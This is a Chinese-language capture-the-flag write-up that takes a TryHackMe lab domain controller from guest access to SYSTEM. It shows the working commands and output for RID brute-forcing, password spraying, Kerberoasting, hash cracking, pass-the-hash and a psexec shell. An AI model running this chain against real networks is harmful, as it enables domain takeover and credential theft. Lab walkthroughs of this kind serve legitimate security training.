【Tryhackme】Soupedecode 01 域控渗透
最近在HackTheBox上学习了活动目录相关的模块,正好thm还剩着几天会员,就找房间练习一下
本次只有命令行操作,所以没有截图不影响阅读
首先是用nmap扫描一下,nmap -sS -Pn -p- <IP> 全端口扫描,然后针对开放端口做进一步扫描
# nmap -sT -A -Pn -p53,88,135,139,389,445,464,593,636,3268,3269,3389,9389,49664,49667,49676,49716 10.201.112.44
Starting Nmap 7.80 ( https://nmap.org ) at 2025-08-03 04:06 UTC
Stats: 0:00:10 elapsed; 0 hosts completed (1 up), 1 undergoing Service Scan
Service scan Timing: About 64.71% done; ETC: 04:06 (0:00:05 remaining)
Stats: 0:02:54 elapsed; 0 hosts completed (1 up), 1 undergoing Script Scan
NSE Timing: About 99.87% done; ETC: 04:09 (0:00:00 remaining)
Nmap scan report for 10.201.112.44
Host is up (0.24s latency).
PORT STATE SERVICE VERSION
53/tcp open domain?
| fingerprint-strings:
| DNSVersionBindReqTCP:
| version
|_ bind
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2025-08-03 04:06:32Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: SOUPEDECODE.LOCAL0., Site: Default-First-Site-Name)
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: SOUPEDECODE.LOCAL0., Site: Default-First-Site-Name)
3269/tcp open tcpwrapped
3389/tcp open ms-wbt-server Microsoft Terminal Services
| rdp-ntlm-info:
| Target_Name: SOUPEDECODE
| NetBIOS_Domain_Name: SOUPEDECODE
| NetBIOS_Computer_Name: DC01
| DNS_Domain_Name: SOUPEDECODE.LOCAL
| DNS_Computer_Name: DC01.SOUPEDECODE.LOCAL
| Product_Version: 10.0.20348
|_ System_Time: 2025-08-03T04:09:03+00:00
| ssl-cert: Subject: commonName=DC01.SOUPEDECODE.LOCAL
| Not valid before: 2025-06-17T21:35:42
|_Not valid after: 2025-12-17T21:35:42
|_ssl-date: 2025-08-03T04:09:43+00:00; -1s from scanner time.
9389/tcp open mc-nmf .NET Message Framing
49664/tcp open msrpc Microsoft Windows RPC
49667/tcp open msrpc Microsoft Windows RPC
49676/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
49716/tcp open msrpc Microsoft Windows RPC
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port53-TCP:V=7.80%I=7%D=8/3%Time=688EE04E%P=x86_64-pc-linux-gnu%r(DNSVe
SF:rsionBindReqTCP,20,"\0\x1e\0\x06\x81\x04\0\x01\0\0\0\0\0\0\x07version\x
SF:04bind\0\0\x10\0\x03");
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running (JUST GUESSING): Microsoft Windows 2016 (85%)
OS CPE: cpe:/o:microsoft:windows_server_2016
Aggressive OS guesses: Microsoft Windows Server 2016 (85%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 4 hops
Service Info: Host: DC01; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
|_clock-skew: mean: -1s, deviation: 0s, median: -1s
| smb2-security-mode:
| 2.02:
|_ Message signing enabled and required
| smb2-time:
| date: 2025-08-03T04:09:04
|_ start_date: N/A
TRACEROUTE (using proto 1/icmp)
HOP RTT ADDRESS
1 168.72 ms 10.14.0.1
2 ... 3
4 237.70 ms 10.201.112.44
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 320.01 seconds
虽然在介绍页就已经说了这是一个域控,但是通过开放的端口信息也能看出来,53和88端口就是很典型的特征
由于没有凭据,所以现在可以做的无非就是试一下有无SMB空会话,通过SMB空会话,也许可以收集所有账户和组的信息,同时检查密码策略,就可以根据密码策略来进行密码喷洒了;也可以试试看有没有哪些共享能直接访问,搜集敏感文件
使用rpcclient尝试空会话登录,很遗憾失败
用enum4linux-ng自动枚举也没有什么有用的信息
rpcclient -U "" 10.201.42.228 -N
Cannot connect to server. Error was NT_STATUS_ACCESS_DENIED
enum4linux-ng -P 10.201.42.228
ENUM4LINUX - next generation (v1.3.4)
==========================
| Target Information |
==========================
[*] Target ........... 10.201.42.228
[*] Username ......... ''
[*] Random Username .. 'mgvdoeqa'
[*] Password ......... ''
[*] Timeout .......... 5 second(s)
======================================
| Listener Scan on 10.201.42.228 |
======================================
[*] Checking SMB
[+] SMB is accessible on 445/tcp
[*] Checking SMB over NetBIOS
[+] SMB over NetBIOS is accessible on 139/tcp
==========================================
| SMB Dialect Check on 10.201.42.228 |
==========================================
[*] Trying on 445/tcp
[+] Supported dialects and settings:
Supported dialects:
SMB 1.0: false
SMB 2.02: true
SMB 2.1: true
SMB 3.0: true
SMB 3.1.1: true
Preferred dialect: SMB 3.0
SMB1 only: false
SMB signing required: true
============================================================
| Domain Information via SMB session for 10.201.42.228 |
============================================================
[*] Enumerating via unauthenticated SMB session on 445/tcp
[+] Found domain information via SMB
NetBIOS computer name: DC01
NetBIOS domain name: SOUPEDECODE
DNS domain: SOUPEDECODE.LOCAL
FQDN: DC01.SOUPEDECODE.LOCAL
Derived membership: domain member
Derived domain: SOUPEDECODE
==========================================
| RPC Session Check on 10.201.42.228 |
==========================================
[*] Check for null session
[-] Could not establish null session: STATUS_ACCESS_DENIED
[*] Check for random user
[+] Server allows session using username 'mgvdoeqa', password ''
[H] Rerunning enumeration with user 'mgvdoeqa' might give more results
[!] Aborting remainder of tests, sessions are possible, but not with the provided credentials (see session check results)
Completed after 8.24 seconds
尝试访问共享,可看到有两个有趣的共享,很遗憾的是都不能直接访问
smbclient -L \\10.201.42.228
Password for [WORKGROUP\root]:
Sharename Type Comment
--------- ---- -------
ADMIN$ Disk Remote Admin
backup Disk
C$ Disk Default share
IPC$ IPC Remote IPC
NETLOGON Disk Logon server share
SYSVOL Disk Logon server share
Users Disk
SMB1 disabled -- no workgroup available
既然这样,明显现在最急需的就是一组凭据,尝试用kerbrute枚举出一些有效的用户名
../../kerbrute_linux_amd64 userenum -d SOUPEDECODE.LOCAL --dc 10.201.42.228 /usr/share/seclists/Usernames/xato-net-10-million-usernames.txt -o vusers.txt
__ __ __
/ /_____ _____/ /_ _______ __/ /____
/ //_/ _ \/ ___/ __ \/ ___/ / / / __/ _ \
/ ,< / __/ / / /_/ / / / /_/ / /_/ __/
/_/|_|\___/_/ /_.___/_/ \__,_/\__/\___/
Version: v1.0.3 (9dad6e1) - 08/03/25 - Ronnie Flathers @ropnop
2025/08/03 08:48:26 > Using KDC(s):
2025/08/03 08:48:26 > 10.201.42.228:88
2025/08/03 08:48:26 > [+] VALID USERNAME: admin@SOUPEDECODE.LOCAL
2025/08/03 08:48:27 > [+] VALID USERNAME: charlie@SOUPEDECODE.LOCAL
2025/08/03 08:48:41 > [+] VALID USERNAME: guest@SOUPEDECODE.LOCAL
2025/08/03 08:48:43 > [+] VALID USERNAME: Charlie@SOUPEDECODE.LOCAL
2025/08/03 08:49:11 > [+] VALID USERNAME: administrator@SOUPEDECODE.LOCAL
2025/08/03 08:49:14 > [+] VALID USERNAME: Admin@SOUPEDECODE.LOCAL
发现了四个用户,其中一个是guest
处理一下后
admin
charlie
administrator
guest
首先先看一下有没有AS-REP Roastable的用户,也就是不使用Kerberos预认证的用户,我们可以直接获得用户的TGT,然后破解他的hash
用impacket的GetNPUsers.py工具进行攻击
很遗憾没有
/root/.local/bin/GetNPUsers.py SOUPEDECODE.LOCAL/ -usersfile vusers.txt -dc-ip 10.201.42.228
/root/.local/share/pipx/venvs/impacket/lib/python3.13/site-packages/impacket/version.py:12: UserWarning: pkg_resources is deprecated as an API. See https://setuptools.pypa.io/en/latest/pkg_resources.html. The pkg_resources package is slated for removal as early as 2025-11-30. Refrain from using this package or pin to Setuptools<81.
import pkg_resources
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies
/root/.local/bin/GetNPUsers.py:165: DeprecationWarning: datetime.datetime.utcnow() is deprecated and scheduled for removal in a future version. Use timezone-aware objects to represent datetimes in UTC: datetime.datetime.now(datetime.UTC).
now = datetime.datetime.utcnow() + datetime.timedelta(days=1)
[-] User admin doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User charlie doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User administrator doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User guest doesn't have UF_DONT_REQUIRE_PREAUTH set
众所周知,guest用户经常被设置为空密码,尝试用guest再次尝试之前的操作
访问共享是同样的结果,无一可访问
使用rpcclient通过guest用户登录,和之前最明显的一个的区别就是能够进入了,之前是进都进不去,有差异就带来了希望
但是直接用enumdomusers枚举用户还是没有权限,有经验的人已经知道该怎么做了,但是没有经验的人同样也可以想到可行的方法
一个命令不行,不代表所有的都不行
每个用户都有一个RID,那我可不可以通过RID反查用户名呢?如果可行,那可以批量操作来枚举账户名称
queryuser是没权限的,如果只知道这一个命令,那可能就直接放弃这条路了
通过询问ai,明白了lookupsids可以根据sid反查用户名,并且域的sid+rid形成一个唯一的安全标识,再次询问用什么命令获得域sid,得到答案lsaquery
rpcclient -U "guest" 10.201.42.228
Password for [WORKGROUP\guest]:
rpcclient $> lsaquery
Domain Name: SOUPEDECODE
Domain Sid: S-1-5-21-2986980474-46765180-2505414164
rpcclient $> lookupsids S-1-5-21-2986980474-46765180-2505414164-500
S-1-5-21-2986980474-46765180-2505414164-500 SOUPEDECODE\Administrator (1)
rpcclient $> enumdomusers
result was NT_STATUS_ACCESS_DENIED
rpcclient $>
验证可行后,通过在网上搜索RID 爆破,RID 枚举关键词,得到了crackmapexec的--rid-brute参数
列举出所有账户和组
crackmapexec smb 10.201.42.228 -u guest -p "" --rid-brute
SMB 10.201.42.228 445 DC01 [*] Windows Server 2022 Build 20348 x64 (name:DC01) (domain:SOUPEDECODE.LOCAL) (signing:True) (SMBv1:False)
SMB 10.201.42.228 445 DC01 [+] SOUPEDECODE.LOCAL\guest:
SMB 10.201.42.228 445 DC01 [+] Brute forcing RIDs
SMB 10.201.42.228 445 DC01 498: SOUPEDECODE\Enterprise Read-only Domain Controllers (SidTypeGroup)
SMB 10.201.42.228 445 DC01 500: SOUPEDECODE\Administrator (SidTypeUser)
SMB 10.201.42.228 445 DC01 501: SOUPEDECODE\Guest (SidTypeUser)
SMB 10.201.42.228 445 DC01 502: SOUPEDECODE\krbtgt (SidTypeUser)
SMB 10.201.42.228 445 DC01 512: SOUPEDECODE\Domain Admins (SidTypeGroup)
SMB 10.201.42.228 445 DC01 513: SOUPEDECODE\Domain Users (SidTypeGroup)
SMB 10.201.42.228 445 DC01 514: SOUPEDECODE\Domain Guests (SidTypeGroup)
SMB 10.201.42.228 445 DC01 515: SOUPEDECODE\Domain Computers (SidTypeGroup)
SMB 10.201.42.228 445 DC01 516: SOUPEDECODE\Domain Controllers (SidTypeGroup)
SMB 10.201.42.228 445 DC01 517: SOUPEDECODE\Cert Publishers (SidTypeAlias)
SMB 10.201.42.228 445 DC01 518: SOUPEDECODE\Schema Admins (SidTypeGroup)
SMB 10.201.42.228 445 DC01 519: SOUPEDECODE\Enterprise Admins (SidTypeGroup)
对输出处理,保留账户名称,然后对每个账户尝试弱口令,当然也可以用一个密码来喷洒,但是不知道该用什么,所以还是尝试密码就是用户名的可能性更大
可以看到出了一个结果
crackmapexec smb 10.201.42.228 -u users.txt -p users.txt --no-bruteforce --continue-on-success | grep +
SMB 10.201.42.228 445 DC01 [+] SOUPEDECODE.LOCAL\ybob317:ybob317
htb的课程告诉我,渗透测试是一个迭代的过程,获得了新的账户,要重复之前的一些过程,经常会有新的发现
这次成功登入了Users共享,但是backup还是没有权限
很容易看出这是windows的users目录,可以在ybob317的Desktop下找到第一个flag
然后使用了crackmapexec的spider_plus模块爬取文件,并没有找到有用的信息
smbclient -U "ybob317" //10.201.42.228/Users
Password for [WORKGROUP\ybob317]:
Try "help" to get a list of possible commands.
smb: \> ls
. DR 0 Thu Jul 4 22:48:22 2024
.. DHS 0 Wed Jun 18 22:14:47 2025
admin D 0 Thu Jul 4 22:49:01 2024
Administrator D 0 Sun Aug 3 08:19:57 2025
All Users DHSrn 0 Sat May 8 08:26:16 2021
Default DHR 0 Sun Jun 16 02:51:08 2024
Default User DHSrn 0 Sat May 8 08:26:16 2021
desktop.ini AHS 174 Sat May 8 08:14:03 2021
Public DR 0 Sat Jun 15 17:54:32 2024
ybob317 D 0 Mon Jun 17 17:24:32 2024
之后又尝试了bloodhound-python来收集信息,但是不知为何总是报错,所以干脆就直接尝试找能够kerberoasting的服务账户,当然可以试一下能不能通过rdp登陆上域控,然后收集信息,这里我没有尝试
先用GetUserSPNs.py探测一下有哪些服务账户,然后加上-request来获取票证
/root/.local/bin/GetUserSPNs.py -dc-ip 10.201.42.228 SOUPEDECODE.LOCAL/ybob317
/root/.local/share/pipx/venvs/impacket/lib/python3.13/site-packages/impacket/version.py:12: UserWarning: pkg_resources is deprecated as an API. See https://setuptools.pypa.io/en/latest/pkg_resources.html. The pkg_resources package is slated for removal as early as 2025-11-30. Refrain from using this package or pin to Setuptools<81.
import pkg_resources
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies
Password:
ServicePrincipalName Name MemberOf PasswordLastSet LastLogon Delegation
---------------------- -------------- -------- -------------------------- --------- ----------
FTP/FileServer file_svc 2024-06-17 17:32:23.726085 <never>
FW/ProxyServer firewall_svc 2024-06-17 17:28:32.710125 <never>
HTTP/BackupServer backup_svc 2024-06-17 17:28:49.476511 <never>
HTTP/WebServer web_svc 2024-06-17 17:29:04.569417 <never>
HTTPS/MonitoringServer monitoring_svc 2024-06-17 17:29:18.511871 <never>
/root/.local/bin/GetUserSPNs.py -dc-ip 10.201.42.228 SOUPEDECODE.LOCAL/ybob317 -request
/root/.local/share/pipx/venvs/impacket/lib/python3.13/site-packages/impacket/version.py:12: UserWarning: pkg_resources is deprecated as an API. See https://setuptools.pypa.io/en/latest/pkg_resources.html. The pkg_resources package is slated for removal as early as 2025-11-30. Refrain from using this package or pin to Setuptools<81.
import pkg_resources
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies
Password:
ServicePrincipalName Name MemberOf PasswordLastSet LastLogon Delegation
---------------------- -------------- -------- -------------------------- --------- ----------
FTP/FileServer file_svc 2024-06-17 17:32:23.726085 <never>
FW/ProxyServer firewall_svc 2024-06-17 17:28:32.710125 <never>
HTTP/BackupServer backup_svc 2024-06-17 17:28:49.476511 <never>
HTTP/WebServer web_svc 2024-06-17 17:29:04.569417 <never>
HTTPS/MonitoringServer monitoring_svc 2024-06-17 17:29:18.511871 <never>
[-] CCache file is not found. Skipping...
$krb5tgs$23$*file_svc$SOUPEDECODE.LOCAL$SOUPEDECODE.LOCAL/file_svc*$44c32b4356fe91bab1ef477b8255bb48$6e5386553b4167022af183c93e592662166a62357a6decc27023e265e2c5f18b...
五个账户都能获取票证,票证是由服务账户的Hash加密的,所以可以尝试破解
将hash值放到hash.txt文件中,用hashcat破解,字典是经典的rockyou
唯一一个成功的是file_svc
sudo hashcat -a 0 -m 13100 hash.txt /usr/share/wordlists/rockyou.txt
得到新的凭据后,再次重复之前的流程,看有没有新的发现,果然这次可以访问backup共享了
得到了一个文件
smbclient -U "file_svc" //10.201.42.228/backup
Password for [WORKGROUP\file_svc]:
Try "help" to get a list of possible commands.
smb: \> ls
. D 0 Mon Jun 17 17:41:17 2024
.. DR 0 Fri Jul 25 17:51:20 2025
backup_extract.txt A 892 Mon Jun 17 08:41:05 2024
12942591 blocks of size 4096. 10602790 blocks available
smb: \> get backup_extract.txt
getting file \backup_extract.txt of size 892 as backup_extract.txt (0.9 KiloBytes/sec) (average 0.9 KiloBytes/sec)
文件内容是一些机器账户的hash
cat backup_extract.txt
WebServer$:2119:aad3b435b51404eeaad3b435b51404ee:c47b45f5d4df5a494bd19f13e14f7902:::
DatabaseServer$:2120:aad3b435b51404eeaad3b435b51404ee:406b424c7b483a42458bf6f545c936f7:::
CitrixServer$:2122:aad3b435b51404eeaad3b435b51404ee:48fc7eca9af236d7849273990f6c5117:::
FileServer$:2065:aad3b435b51404eeaad3b435b51404ee:e41da7e79a4c76dbd9cf79d1cb325559:::
MailServer$:2124:aad3b435b51404eeaad3b435b51404ee:46a4655f18def136b3bfab7b0b4e70e3:::
很明显应该将这些hash全部尝试一遍,用crackmapexec
可看到有一个成功了,而且有Pwn!的标识,说明这个账户在域控上有管理员权限
crackmapexec smb 10.201.42.228 -u coms.txt -H hashes.txt --no-bruteforce --continue-on-success
SMB 10.201.42.228 445 DC01 [*] Windows Server 2022 Build 20348 x64 (name:DC01) (domain:SOUPEDECODE.LOCAL) (signing:True) (SMBv1:False)
SMB 10.201.42.228 445 DC01 [-] SOUPEDECODE.LOCAL\WebServer$:c47b45f5d4df5a494bd19f13e14f7902 STATUS_LOGON_FAILURE
SMB 10.201.42.228 445 DC01 [-] SOUPEDECODE.LOCAL\DatabaseServer$:406b424c7b483a42458bf6f545c936f7 STATUS_LOGON_FAILURE
SMB 10.201.42.228 445 DC01 [-] SOUPEDECODE.LOCAL\CitrixServer$:48fc7eca9af236d7849273990f6c5117 STATUS_LOGON_FAILURE
SMB 10.201.42.228 445 DC01 [+] SOUPEDECODE.LOCAL\FileServer$:e41da7e79a4c76dbd9cf79d1cb325559 (Pwn3d!)
使用impacket的psexec.py尝试获取shell
成功后为system账户,直接去管理员的桌面上可获得第二个flag
/root/.local/bin/psexec.py SOUPEDECODE.LOCAL/'FileServer$'@10.201.42.228 -hashes :e41da7e79a4c76dbd9cf79d1cb325559
/root/.local/share/pipx/venvs/impacket/lib/python3.13/site-packages/impacket/version.py:12: UserWarning: pkg_resources is deprecated as an API. See https://setuptools.pypa.io/en/latest/pkg_resources.html. The pkg_resources package is slated for removal as early as 2025-11-30. Refrain from using this package or pin to Setuptools<81.
import pkg_resources
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies
[*] Requesting shares on 10.201.42.228.....
[*] Found writable share ADMIN$
[*] Uploading file lJEHYjMS.exe
[*] Opening SVCManager on 10.201.42.228.....
[*] Creating service bGQb on 10.201.42.228.....
[*] Starting service bGQb.....
[!] Press help for extra shell commands Microsoft Windows [Version 10.0.20348.587]
(c) Microsoft Corporation. All rights reserved.
C:\Windows\system32> whoami nt authority\system
路径:guest空密码-->rid爆破获得用户列表->弱口令->获取服务账户来kerberoasting->访问smb共享找到备份的账户和哈希列表->尝试登录有一个成功并具有管理员权限
浙公网安备 33010602011771号